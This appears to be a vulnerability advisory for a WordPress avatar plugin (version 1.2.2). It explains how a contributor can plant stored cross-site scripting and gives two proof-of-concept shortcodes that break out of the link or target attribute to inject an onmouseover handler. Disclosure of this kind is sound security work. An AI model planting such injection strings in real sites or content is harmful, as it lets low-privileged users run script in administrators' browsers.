Description The plugin does not properly sanitize and escape certain of its shortcodes attributes, which could allow relatively low-privileged users like contributors to conduct Stored XSS attacks.
As a Contributor+ create a new post and add one of the following shortcode. [avatar user=“admin” size=“96” align=“left” link=‘" onmouseover=“alert(/XSS/)”’ /] [avatar user=“admin” size=“96” align=“left” link=“/” target=‘" onmouseover=“alert(/XSS/)”’ /] Save it to be reviewed. When an admin reviews the post and moves the mouse over the added code, the payload will be delivered.
CPE | Name | Operator | Version |
---|---|---|---|
eq | 1.2.2 |